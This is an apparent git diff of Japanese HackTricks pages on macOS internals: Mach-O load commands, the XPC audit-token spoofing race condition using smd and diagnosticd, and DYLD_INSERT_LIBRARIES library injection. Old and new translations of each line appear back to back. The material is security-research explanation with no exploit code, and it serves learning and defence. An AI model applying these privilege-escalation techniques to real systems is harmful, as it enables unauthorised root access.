このロードコマンドは、**ローダー**dyldに**ライブラリのロードとリンクを指示**する**動的ライブラリ**依存関係を記述します。Mach-Oバイナリが必要とする各ライブラリにはLC\_LOAD\_DYLIBロードコマンドがあります。
* このロードコマンドは、実際の依存する動的ライブラリを記述する構造体dylibを含む**`dylib_command`**型の構造体です。
* このロードコマンドは、実際の依存動的ライブラリを記述する**`dylib`**構造体を含む**`dylib_command`**型の構造体です:
```
```objectivec
struct dylib_command {
uint32_t cmd; /* LC_LOAD_{,WEAK_}DYLIB */
@ -251,8 +252,10 @@ uint32_t current_version; /* library's current version number */
uint32_t compatibility_version; /* library's compatibility vers number*/
};
```
```plaintext
cliでこの情報を取得することもできます:
以下のコマンドでもこの情報を取得できます:
```bash
file /bin/ls
```
```bash
otool -L /bin/ls
@ -261,51 +264,51 @@ otool -L /bin/ls
/usr/lib/libncurses.5.4.dylib (compatibility version 5.4.0, current version 5.4.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1319.0.0)
```
潜在的なマルウェア関連ライブラリには以下があります:
いくつかの潜在的なマルウェア関連ライブラリは次のとおりです:
* **DiskArbitration**USBドライブの監視
* **AVFoundation**:オーディオとビデオのキャプチャ
* **CoreWLAN**Wifiスキャン。
- **DiskArbitration**USBドライブの監視
- **AVFoundation**:オーディオとビデオのキャプチャ
- **CoreWLAN**Wifiスキャン
{% hint style="info" %}
Mach-Oバイナリには、**LC\_MAIN**で指定されたアドレスの**前に** **実行される**1つまたは**複数の** **コンストラクタ**を含むことができます。
コンストラクタのオフセットは、**\_\_DATA\_CONST**セグメントの**\_\_mod\_init\_func**セクションに保持されています。
Mach-Oバイナリには、**LC\_MAIN**で指定されたアドレスの**前に実行される**1つ以上の**コンストラクタ**が含まれる可能性があります。\
任意のコンストラクタのオフセットは、**\_\_DATA\_CONST**セグメントの**\_\_mod\_init\_func**セクションに保持されます。
{% endhint %}
## **Mach-Oデータ**
ファイルの核心は、最終領域であるデータで、ロードコマンド領域にレイアウトされたいくつかのセグメントで構成されています。**各セグメントには複数のデータセクションが含まれる可能性があります**。これらのセクションはそれぞれ、特定のタイプの**コードまたはデータを含んでいます**。
ファイルの中心には、ロードコマンド領域で定義された複数のセグメントで構成されるデータ領域があります。**各セグメントにはさまざまなデータセクションが収容され、各セクションには特定のタイプに固有のコードまたはデータが含まれます**。
{% hint style="success" %}
データは基本的に、ロードコマンド**LC\_SEGMENTS\_64**によってロードされるすべての**情報**を含む部分です。
データは基本的に、ロードコマンド**LC\_SEGMENTS\_64**によって読み込まれる**すべての情報**を含む部分です。
{% endhint %}
![](<../../../.gitbook/assets/image (507) (3).png>)
![https://www.oreilly.com/api/v2/epubs/9781785883378/files/graphics/B05055_02_38.jpg](<../../../.gitbook/assets/image (507) (3).png>)
これには以下が含まれます:
これには次のものが含まれます:
* **関数テーブル**:プログラム関数に関する情報を保持しています。
* **シンボルテーブル**:バイナリによって使用される外部関数に関する情報を含んでいます。
* 内部関数や変数名なども含まれる可能性があります。
- **関数テーブル**:プログラム関数に関する情報を保持します。
- **シンボルテーブル**:バイナリで使用される外部関数に関する情報を含みます。
- 内部関数、変数名なども含まれる可能性があります。
これを確認するには、[**Mach-O View**](https://sourceforge.net/projects/machoview/)ツールを使用できます:
確認するには、[**Mach-O View**](https://sourceforge.net/projects/machoview/)ツールを使用できます:
<figure><img src="../../../.gitbook/assets/image (2) (1) (4).png" alt=""><figcaption></figcaption></figure>
またはCLIから
またはCLIから
```bash
size -m /bin/ls
```
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、当社の独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>

108
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
View file

@ -2,105 +2,105 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでのAWSハッキングを学ぶ</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
* **HackTricks で企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェック!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)を入手
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする。
</details>
**詳細は元の投稿をご確認ください: [https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)**。これは要約です:
## Machメッセージの基本情報
Machメッセージについて知らない場合は、このページをチェックしてください:
Machメッセージが何かわからない場合は、このページをチェックしてください:
{% content-ref url="../../../../mac-os-architecture/macos-ipc-inter-process-communication/" %}
[macos-ipc-inter-process-communication](../../../../mac-os-architecture/macos-ipc-inter-process-communication/)
{% endcontent-ref %}
覚えておくべきことは:
Machメッセージは_machポート_を介して送信され、これはmachカーネルに組み込まれた**シングルレシーバー、マルチプルセンダーの通信チャネル**です。**複数のプロセスが**メッセージをmachポートに送信できますが、任意の時点で**単一のプロセスのみがそれから読み取ることができます**。ファイルディスクリプタやソケットと同様に、machポートはカーネルによって割り当てられ管理され、プロセスは整数を見ることができます。これを使用して、どのmachポートを使用したいかをカーネルに指示できます。
今のところ、([ここからの定義](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing))\
Machメッセージは_machポート_を介して送信され、これは**単一の受信者、複数の送信者通信**チャネルで、machカーネルに組み込まれています。**複数のプロセスが**machポートにメッセージを送信できますが、いつでも**単一のプロセスだけがそれを読むことができます**。ファイルディスクリプタやソケットと同様に、machポートはカーネルによって割り当てられ管理され、プロセスは整数しか見ず、それを使用してカーネルに自分のmachポートのどれを使用するかを示すことができます。
## XPC接続
XPC接続がどのように確立されるかわからない場合は、チェックしてください:
XPC接続がどのように確立されるかわからない場合は、次をチェックしてください:
{% content-ref url="../" %}
[..](../)
{% endcontent-ref %}
## 脆弱性の
## 脆弱性の要
あなたが知っておくべき興味深い点は、**XPCの抽象化は一対一の接続ですが**、これは**複数の送信者を持つことができる技術の上に構築されている**ということです。
あなたが知っておくべき興味深い点は、**XPCの抽象化は1対1の接続**であるが、**複数の送信者を持つ技術**に基づいていることです:
* Machポートはシングルレシーバー、**マルチプルセンダー**です。
* XPC接続の監査トークンは、**最も最近に受信したメッセージからコピーされた**監査トークンです。
* XPC接続の**監査トークン**を取得することは、多くの**セキュリティチェック**にとって重要です。
* Machポートは単一の受信者、**複数の送信者**です。
* XPC接続の監査トークンは、**最に受信したメッセージからコピーされた監査トークン**です。
* XPC接続の監査トークンを取得することは、多くの**セキュリティチェック**にとって重要です。
前述の状況は有望に聞こえますが、問題を引き起こさないシナリオもあります:
前述の状況は有望に聞こえますが、問題を引き起こさないシナリオもあります ([ここから](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):
* 監査トークンは、接続を受け入れるかどうかを決定するための認チェックによく使用されます。これはサービスポートへのメッセージを使用して行われるため、**まだ接続が確立されていません**。このポートでのさらなるメッセージは、追加の接続要求として処理されるだけです。したがって、接続を受け入れる前の**チェックは脆弱ではありません**(これはまた、`-listener:shouldAcceptNewConnection:`内の監査トークンが安全であることを意味します)。したがって、私たちは**特定のアクションを検証するXPC接続を探しています**。
* XPCイベントハンドラーは同期的に処理されます。これは、イベントハンドラーが次のメッセージに対して呼び出される前に、1つのメッセージのイベントハンドラーが完了しなければならないことを意味します。たとえ並行ディスパッチキュー上であっても、**XPCイベントハンドラー内では監査トークンが他の通常の返信以外の!)メッセージによって上書きされることはありません**。
* 監査トークンは、接続を受け入れるかどうかを決定するための認チェックによく使用されます。これはサービスポートへのメッセージを使用して行われるため、**まだ接続が確立されていません**。このポートへの追加のメッセージは追加の接続要求として処理されます。したがって、**接続を受け入れる前のチェックは脆弱ではありません**(これは、`-listener:shouldAcceptNewConnection:`内の監査トークンが安全であることを意味します)。したがって、**特定のアクションを検証するXPC接続を探しています**。
* XPCイベントハンドラは同期的に処理されます。つまり、1つのメッセージのイベントハンドラが次のメッセージのイベントハンドラを呼び出す前に完了する必要があります。そのため、**XPCイベントハンドラ内では、監査トークンは他の通常の返信でない!)メッセージによって上書きされることはありません**。
これにより、可能性がある2つの異なる方法が考えられました:
これが悪用される可能性がある2つの異なる方法:
1. Variant1:
* **エクスプロイト**はサービス**A**とサービス**B**に**接続します**
* サービス**B**は、ユーザーができないサービスAで**特権機能を呼び出す**ことができます
* サービス**A**は、接続の**イベントハンドラー**内で_**ない**_場合に**`dispatch_async`**を使用して**`xpc_connection_get_audit_token`**を呼び出します。
* したがって、異なるメッセージが**監査トークンを上書き**する可能性があります。なぜなら、それはイベントハンドラの外で非同期にディスパッチされているからです。
* エクスプロイトは、サービスAへのSEND権限を**サービスBに渡します**。
* したがって、svc **B**は実際に**メッセージを**サービス**A**に**送信します**
* **エクスプロイト**は**特権アクションを呼び出そうとします**。RC svc **A**は、**svc Bが監査トークンを上書きした**間にこの**アクション**の認証を**チェック**します(エクスプロイトが特権アクションを呼び出すアクセスを与えます)
* **Exploit** がサービス **A** とサービス **B** に**接続**
* サービス **B** は、ユーザーができない**サービス A の特権機能**を呼び出すことができます
* サービス **A****`dispatch_async`** 内で**イベントハンドラ**にいない状態で **`xpc_connection_get_audit_token`** を呼び出します。
* したがって、**異なる**メッセージが**監査トークンを上書き**する可能性があります。なぜなら、イベントハンドラの外で非同期にディスパッチされているからです。
* 攻撃は、**サービス A に対して SEND 権限をサービス B に渡します**。
* したがって、svc **B** は実際にはサービス **A** に**メッセージを送信**します
* **Exploit** は**特権アクションを呼び出そうとします**。RC svc **A** はこの**アクション**の認可を**チェック**し、**svc B が監査トークンを上書き**したため(攻撃が特権アクションを呼び出す権限を与えられる)、攻撃がアクションを呼び出す権限を与えられます
2. Variant 2:
* サービス**B**は、ユーザーができないサービスAで**特権機能を呼び出す**ことができます
* エクスプロイトは**サービスA**に接続し、特定の**返信** **ポート**で応答を期待する**メッセージをエクスプロイトに送信します**
* エクスプロイトは、**その返信ポートを**持つメッセージを**サービスB**に送信します。
* サービス**Bが返信するとき**、それはメッセージをサービスAに**送信します**。**一方で**、**エクスプロイト**は異なる**メッセージをサービスAに送信し**、特権機能に**到達しようとします**。そして、サービスBからの返信が完璧な瞬間に監査トークンを上書きすることを期待しますRace Condition)。
* サービス **B** は、ユーザーができない**サービス A の特権機能**を呼び出すことができます
* Exploit は、**サービス A** に接続し、特定の**リプライポート**で**応答を期待するメッセージを送信**します
* Exploit は、**サービス B** に**そのリプライポート**を渡すメッセージを送信します。
* サービス **B が応答する**と、**サービス A にメッセージを送信**し、**Exploit** は**サービス A に異なるメッセージを送信**し、特権機能に到達しようとし、サービス B からの返信が監査トークンを完璧なタイミングで上書きすることを期待します(競合状態)。
## Variant 1: イベントハンドラーの外でxpc\_connection\_get\_audit\_tokenを呼び出す <a href="#variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler" id="variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler"></a>
## Variant 1: イベントハンドラ外で xpc\_connection\_get\_audit\_token を呼び出す <a href="#variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler" id="variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler"></a>
シナリオ:
* 二つのmach **サービス**`A`**と**`B`**に接続できます(サンドボックスプロファイルと接続を受け入れる前の認証チェックに基づいて)。
* _**A**_は、**`B`**が合格できる(しかし私たちのアプリではできない)特定のアクションのための**認証チェック**を持っていなければなりません
* 例えば、Bがいくつかの**権限**を持っていたり、**root**として実行されている場合、それは彼にAに特権アクションを実行させることを許可するかもしれません。
* この認証チェックのために、**`A`**は監査トークンを非同期で取得します。例えば、**`dispatch_async`**から`xpc_connection_get_audit_token`を呼び出すことによって
* 両方に接続できる2つのmachサービス **`A`** と **`B`**(サンドボックスプロファイルと接続を受け入れる前の認可チェックに基づく)。
* _**A**_ は、**`B`** が通過できる特定のアクションの**認可チェック**を持っている必要があります(ただし、アプリケーションはできません)
* たとえば、Bには**エンタイトルメント**があるか**root**として実行されている場合、Aに特権アクションを実行するように依頼できるかもしれません。
* この認可チェックのために、**`A`** は非同期で監査トークンを取得します。たとえば、`dispatch_async` から **`xpc_connection_get_audit_token`** を呼び出すことで
{% hint style="danger" %}
この場合、攻撃者は**エクスプロイト**をトリガーして、**Aにアクションを実行するように何度も依頼し**、同時に**Bが`A`にメッセージを送信する**ことができます。RCが**成功する**と、**Bの監査トークン**がメモリにコピーされ、Aが私たちの**エクスプロイト**のリクエストを**処理**している間に、それはBだけが要求できる**特権アクションへのアクセスを与えます**
この場合、攻撃者は**Race Condition**をトリガーし、**`Aにアクションを実行するように依頼するExploit**を作成し、**BがAにメッセージを送信**するようにします。RCが**成功する**と、**Bの監査トークン**が**メモリにコピー**され、**Exploit**のリクエストが**Aによって処理**される間に、特権アクションにのみBがリクエストできる**アクセス**が与えられます
{% endhint %}
これは**`A`**が`smd`であり、**`B`**が`diagnosticd`であった場合に発生しました。関数[`SMJobBless`](https://developer.apple.com/documentation/servicemanagement/1431078-smjobbless?language=objc)は、新しい特権ヘルパーツールをインストールするためにsmbで使用できます**root**として)。**rootとして実行されるプロセスが**smd**に連絡する**場合、他のチェックは実行されません。
これは、**`A`** が `smd` として、**`B`** が `diagnosticd` として発生しました。 smb の [`SMJobBless`](https://developer.apple.com/documentation/servicemanagement/1431078-smjobbless?language=objc) 関数は、新しい特権ヘルパーツール(**root**として)をインストールするために使用できます。**root**として実行されているプロセスが **smd** に連絡すると、他のチェックは実行されません。
したがって、サービス**B**は**`diagnosticd`**です。なぜなら、それは**root**として実行され、プロセスを**監視**するために使用できるからです。監視が開始されると、それは**秒間に複数のメッセージを送信します**
したがって、サービス **B****`diagnosticd`** であり、**root**として実行されているため、プロセスを監視するために使用できます。したがって、監視が開始されると、1秒あたりに**複数のメッセージ**が送信されます
攻撃を実行するには:
1. 通常のXPCプロトコルに従って**`smd`**への**接続**を確立します。
2. 次に、**`diagnosticd`**への**接続**を確立しますが、新しいmachポートを二つ生成して送信する代わりに、クライアントポートの送信権を**`smd`**への接続のために持っている送信権のコピーに置き換えます。
3. これは、私たちが`diagnosticd`にXPCメッセージを送信できることを意味しますが、**`diagnosticd`が送信するメッセージは`smd`に行きます**。
* `smd`にとって、私たちのメッセージと`diagnosticd`のメッセージは同じ接続で到着するように見えます。
1. 標準のXPCプロトコルを使用して、サービス名が `smd` のサービスに**接続**を開始します。
2. `diagnosticd` に2次の**接続**を形成します。通常の手順とは異なり、2つの新しいmachポートを作成して送信するのではなく、クライアントポートの送信権限は `smd` 接続に関連付けられた**送信権限**の複製で置き換えられます。
3. その結果、XPCメッセージを `diagnosticd` にディスパッチできますが、`diagnosticd` からの応答は `smd` にリダイレクトされます。`smd` にとっては、ユーザーと `diagnosticd` からのメッセージが同じ接続から発信されているように見えます。
<figure><img src="../../../../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
![攻撃プロセスを描いた画像](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/exploit.png)
4. **`diagnosticd`**に私たちの(または任意のアクティブな)プロセスの**監視を開始するように依頼し**、**`smd`**に特権ツールをインストールするためのルーチン1004メッセージを**スパムします**
5. これにより、`handle_bless`で非常に特定のウィンドウをヒットする必要があるレースコンディションが作成されます。私たちのアプリバンドルに特権ヘルパーツールがあるため、`xpc_connection_get_pid`の呼び出しが私たち自身のプロセスのPIDを返す必要があります。しかし、`connection_is_authorized`関数内の`xpc_connection_get_audit_token`の呼び出しは、`diganosticd`の監査トークンを使用しなければなりません
4. 次のステップは、`diagnosticd` に選択したプロセス(おそらくユーザー自身のプロセス)の監視を開始するよう指示することです。同時に、`smd` にはルーチンの1004メッセージの洪水が送信されます。ここでの目的は、特権を持つツールをインストールすることです
5. このアクションは、`handle_bless` 関数内で競合状態を引き起こします。タイミングが重要です:`xpc_connection_get_pid` 関数呼び出しは、特権ツールがユーザーのアプリバンドルに存在するため、ユーザーのプロセスのPIDを返さなければなりません。ただし、`xpc_connection_get_audit_token` 関数は、特に `connection_is_authorized` サブルーチン内で、`diagnosticd` に属する監査トークンを参照する必要があります
## Variant 2: 返信転送
## Variant 2: リプライの転送
前述のように、XPC接続のイベントに対するハンドラーは、同時に複数回実行されることはありません。しかし、**XPC返信****メッセージは異なる方法で処理されます。返信を期待するメッセージを送信するための2つの関数があります:
XPCクロスプロセス通信環境では、イベントハンドラは同時に実行されませんが、リプライメッセージの処理には独自の動作があります。具体的には、リプライを期待するメッセージを送信するための2つの異なる方法が存在します:
* `void xpc_connection_send_message_with_reply(xpc_connection_t connection, xpc_object_t message, dispatch_queue_t replyq, xpc_handler_t handler)`、この場合、XPCメッセージは指定されたキューで受信および解析されます。
* `xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection, xpc_object_t message)`、この場合、XPCメッセージは現在のディスパッチキューで受信および解析されます。
1. **`xpc_connection_send_message_with_reply`**: ここでは、XPCメッセージが指定されたキューで受信および処理されます。
2. **`xpc_connection_send_message_with_reply_sync`**: 逆に、この方法では、XPCメッセージが現在のディスパッチキューで受信および処理されます。
したがって、**XPC返信パケットは、XPCイベントハンドラーが実行されている間に解析される可能性があります**。`_xpc_connection_set_creds`はロックを使用していますが、これは監査トークンの部分的な上書きを防ぐだけであり、接続オブジェクト全体をロックするわけではありません。これにより、パケットの解析とそのイベントハンドラーの実行の間に**監査トークンを置き換える**ことが可能になります。
この違いは重要です。なぜなら、**リプライパケットがXPCイベントハンドラの実行と同時に解析される可能性**があるからです。特に、`_xpc_connection_set_creds` は、監査トークンの部分的な上書きを防ぐためにロックを実装していますが、この保護を接続オブジェクト全体に拡張していません。その結果、パケットの解析とそのイベントハンドラの実行の間に監査トークンが置き換えられる脆弱性が生じます。
このシナリオには以下が必要です:
この脆弱性を悪用するには、次のセットアップが必要です:
* 前と同様に、接続できる二つのmachサービス**`A`**と**`B`**。
* 再び、**`A`**は、**`B`**が合格できる(しかし私たちのアプリではできない)特定のアクションのための認証チェックを持っていな
- **`A`** と **`B`** と呼ばれる2つのmachサービスが、どちらも接続を確立で

180
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
View file

@ -1,122 +1,119 @@
```markdown
# macOSライブラリインジェクション
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有する
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする
- **ハッキングトリックを共有する**には、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください
</details>
{% hint style="danger" %}
**dyldのコードはオープンソース**であり、[https://opensource.apple.com/source/dyld/](https://opensource.apple.com/source/dyld/)で見つけることができ、**URLを使用してtarをダウンロードすることができます**。例えば、[https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz)です。
**dyldのコードはオープンソース**であり、[https://opensource.apple.com/source/dyld/](https://opensource.apple.com/source/dyld/)で見つけることができ、**`https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz`**のような**URL**を使用して**tar**をダウンロードできます。
{% endhint %}
## **DYLD\_INSERT\_LIBRARIES**
> これは、**プログラムで指定されたものよりも前にロードする動的ライブラリのコロン区切りのリスト**です。これにより、フラット名前空間イメージで使用される既存の動的共有ライブラリの新しいモジュールをテストするために、新しいモジュールだけを持つ一時的な動的共有ライブラリをロードすることができます。これは、DYLD\_FORCE\_FLAT\_NAMESPACEも使用されていない限り、動的共有ライブラリを使用して二レベル名前空間イメージをビルドしたイメージには影響しません。
これは、[**LinuxのLD\_PRELOAD**](../../../../linux-hardening/privilege-escalation#ld\_preload)のようなものです。プロセスに特定のライブラリを読み込むように指示することができます(環境変数が有効になっている場合)
これはLinuxの[**LD\_PRELOAD**](../../../../linux-hardening/privilege-escalation#ld\_preload)と似ています。
このテクニックは、インストールされたすべてのアプリケーションが`LSEnvironmental`というキーを使用して環境変数を割り当てることを許可する"Info.plist"というplistを持っているため、ASEPテクニックとしても**使用される可能性があります**。
このテクニックは、インストールされたすべてのアプリケーションに`LSEnvironmental`というキーを使用して**環境変数を割り当てる**ことを可能にするため、**ASEPテクニックとしても使用**される可能性があります。
{% hint style="info" %}
2012年以降、**Appleは`DYLD_INSERT_LIBRARIES`の力を大幅に削減しました**
2012年以降、**Appleは`DYLD_INSERT_LIBRARIES`の権限を大幅に削減**しています
コードに行って**`src/dyld.cpp`をチェック**してください。**`pruneEnvironmentVariables`**関数では、**`DYLD_*`**変数が削除されていることがわかります。
コードに移動して**`src/dyld.cpp`**を**確認**してください。**`pruneEnvironmentVariables`**関数では、**`DYLD_*`**変数が削除されていることがわかります。
**`processRestricted`**関数では、制限の理由が設定されています。そのコードをチェックすると、理由は以下の通りです:
**`processRestricted`**関数では、制限の理由が設定されています。そのコードを確認すると、理由は次のとおりです。
* バイナリが`setuid/setgid`です
* machoバイナリに`__RESTRICT/__restrict`セクションが存在します。
* ソフトウェアに[`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables)エンタイトルメントなしで権限があります(ハード化されたランタイム)
* バイナリの**エンタイトルメント**をチェックするには`codesign -dv --entitlements :- </path/to/bin>`
- バイナリが`setuid/setgid`である
- machoバイナリに`__RESTRICT/__restrict`セクションが存在する
- ソフトウェアに[`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables)権限がある
- バイナリの**権限**を次のように確認します`codesign -dv --entitlements :- </path/to/bin>`
より更新されたバージョンでは、このロジックは**`configureProcessRestrictions`**関数の第二部分で見つけることができます。ただし、新しいバージョンで実行されるのは、関数の**最初のチェック**ですmacOSでは使用されないiOSまたはシミュレーションに関連するifを削除できます)。
より更新されたバージョンでは、このロジックを**`configureProcessRestrictions`**関数の後半に見つけることができます。ただし、新しいバージョンで実行されるのは、**関数の最初のチェック**ですiOSやシミュレーションに関連するif文はmacOSでは使用されないため、それらを削除できます)。
{% endhint %}
### ライブラリ検証
バイナリが**`DYLD_INSERT_LIBRARIES`**環境変数の使用を許可していても、バイナリがロードするライブラリの署名をチェックする場合、カスタムライブラリはロードされません
バイナリが**`DYLD_INSERT_LIBRARIES`**環境変数を使用することを許可していても、バイナリがライブラリの署名をチェックする場合、カスタムライブラリを読み込まないようになります
カスタムライブラリをロードするためには、バイナリに以下のいずれかのエンタイトルメントが必要です:
カスタムライブラリを読み込むには、バイナリに次のいずれかの権限が必要です。
* [`com.apple.security.cs.disable-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.security.cs.disable-library-validation)
* [`com.apple.private.security.clear-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.private.security.clear-library-validation)
- &#x20;[`com.apple.security.cs.disable-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.security.cs.disable-library-validation)
- [`com.apple.private.security.clear-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.private.security.clear-library-validation)
または、バイナリに**ハード化されたランタイムフラグ**や**ライブラリ検証フラグ**が**ない**べきです。
または、バイナリに**ハード化されたランタイムフラグ**または**ライブラリ検証フラグ**がない必要があります。
バイナリに**ハード化されたランタイム**があるかどうかは、`codesign --display --verbose <bin>`でフラグランタイムを**`CodeDirectory`**でチェックして、次のようにします**`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
バイナリが**ハード化されたランタイム**を持っているかどうかは、`codesign --display --verbose <bin>`を使用して確認し、**`CodeDirectory`**内のランタイムフラグを確認します。例**`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
また、ライブラリがバイナリと同じ証明書で署名されている場合にもロードできます。
また、バイナリが**同じ証明書で署名**されている場合もライブラリを読み込むことができます。
の機能の(悪用)方法と制限のチェック方法の例を以下で見つけることができます
れを悪用する例と制限事項を確認するには、次の場所にアクセスしてください
{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
{% endcontent-ref %}
## Dylibハイジャッ
## Dylibハイジャッキング
{% hint style="danger" %}
前述のライブラリ検証の制限もDylibハイジャック攻撃を行うために**適用されることを覚えておいてください**
Dylibハイジャッキング攻撃を実行するには、**前述のライブラリ検証制限**も適用されます
{% endhint %}
